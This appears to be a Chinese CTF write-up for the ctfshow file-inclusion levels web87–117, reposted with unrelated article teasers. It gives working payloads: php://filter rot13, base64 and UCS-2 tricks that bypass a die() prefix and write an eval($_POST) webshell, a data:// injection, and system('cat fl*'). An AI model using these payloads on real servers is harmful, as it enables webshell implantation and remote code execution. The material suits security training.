ctfshow文件包含web87-117

news/2025/1/24 0:42:03/

1.web87

在这里插入图片描述
绕过死亡待可以使用rot13编码,还可以用base64编码,url两次编码,浏览器自动进行解码一次,代码解码一次,如果之编码一次,代码会被浏览器解码一次,这时候特殊字符还是url编码,而如php字符串则被还原,然后就被过滤了
payload:

1.rot13绕过
#下放url编码为php://filter/write=string.rot13/resource=6.php的两次url编码
file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%36%25%32%65%25%37%30%25%36%38%25%37%30
#post传
content=<?cuc riny($_CBFG[1]);?>
#为<?php eval($_POST[1])?>
2.base64绕过
base64解码时会自动跳过不认识的字符,如空格,括号,中文等
<?php die('大佬别秀了');?>base64解码只解码phpdie,而base64是四个字符解码四个字符的,所以可以填充两个字符,造成php代码失效,而一句话木马能够解码成功
#file=php://filter/write=convert.base64-decode/resource=b.php两次url编码
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%32%25%32%65%25%37%30%25%36%38%25%37%30
#post
content=11PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==
#base64解码<?php @eval($_POST[1]);?>

2.web88

在这里插入图片描述
data没过滤,可以base64编码,注意不能出现=和+,被过滤了
payload:

file=data://text/plain;base64,PD9waHAgIGV2YWwoJF9QT1NUWzFdKSA7
base64为<?php  eval($_POST[1]) ;编码
1=system('cat fl*');

3.web116

是一个视频,下载下来,用010eidtor打开,在最后发现IEND®B,是一张png图片,用foremost还原出图片
foremost 1.mp4 -o 1 进入1.目录就可以找到png图片
在这里插入图片描述
file_get_contents是一个直接读取文件的函数,直接传入flag.php即可
payload:

view-source:http://65c6dc47-80df-4719-b3b2-31bb0932d99b.challenge.ctf.show/?file=flag.php

4.web117

在这里插入图片描述
绕过死亡待还有其他方式,convert.iconv.UCS-2LE.UCS-2BE两位两位的替换位置

payload:

file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=3.php
#post
?<hp pvela$(P_SO[T]1;)>?

ctfshow文件包含


http://www.ppmy.cn/news/608118.html

相关文章

求奇数的和

求奇数的和

求奇数的和 Time Limit: 1 Sec Memory Limit: 128 MB 64bit IO Format: %lld Description 编写程序计算输入数据中的所有奇数的和。 Input 包含多组测试数据&#xff0c;每组测试数据占一行&#xff0c;每行若干个正整数&#xff0c;0表示结束。 Output 每组测试数据输出…
阅读更多...
数据治理(二):数据治理功能方面

数据治理(二):数据治理功能方面

文章目录 数据治理功能方面 一、主数据管理 二、元数据管理 三、数据标准管理 四、数据质量管理 五、数据集成管理 六、数据资产管理 七、数据安全管理 八、​​​​​​​数据生命周期管理 九、​​​​​​​数据交换管理 十、数据治理思维导图 数据治理功能方面 …
阅读更多...
C++ 复制构造函数或者拷贝构造函数

C++ 复制构造函数或者拷贝构造函数

复制构造函数 是一种特殊的构造函数&#xff0c;它在创建对象时&#xff0c;是使用同一类中之前创建的对象来初始化新创建的对象。 复制构造函数通常用于&#xff1a; 通过使用另一个同类型的对象来初始化新创建的对象。 复制对象把它作为参数传递给函数。 复制对象&#…
阅读更多...
常用MySQL函数存储过程_解析MySQL存储过程、常用函数代码

常用MySQL函数存储过程_解析MySQL存储过程、常用函数代码

mysql存储过程的概念&#xff1a;存储在数据库当中可以执行特定工作(查询和更新)的一组SQL代码的程序段。mysql函数的概念&#xff1a;函数是完成特定功能的SQL语句&#xff0c;函数分为内置函数和自定义函数(user-defined function UDF)MySQL存储过程和函数的区别存储过程可以…
阅读更多...
原子层沉积技术

原子层沉积技术

原子层沉积技术 原子层沉积技术 原子层沉积&#xff0c;ALD 是一种适合于研制最新的和前沿性的产品的薄膜制备技术。原子层沉积 ALD 也是一种用于纳米技术研究的有效方法。典型的原子层沉积应用是在各种尺寸和形状的基底上沉积高精度、无针孔、高保形的纳米薄膜。针对目前的市场…
阅读更多...
数据治理(三):数据质量管理

数据治理(三):数据质量管理

​​​​​​ 文章目录 ​​​数据质量管理 一、数据质量概述
阅读更多...
C++ 判断字符串是否为空

C++ 判断字符串是否为空

C 判断字符串是否为空 有2种方法 1种是用使用empty 2 使用 与"" 比较 具体的如下: #include <iostream> #include <string> using namespace std;int main() {string name "";//使用emptyif (name.empty()){cout << "name为空&q…
阅读更多...
Vue 项目中 el-table 表格内容数值转为文字的实现方法详解

Vue 项目中 el-table 表格内容数值转为文字的实现方法详解

系列文章目录 文章目录 系列文章目录前言一、使用计算属性转换数值字段为文字二、使用自定义过滤器转换数值字段为文字总结 前言 在 Vue 项目开发中&#xff0c;使用 el-table 组件展示数据是常见的需求。有时候我们需要将表格中的数值字段转换为相应的文字表示&#xff0c;以…
阅读更多...
最新文章

Copyright @ 2022~2023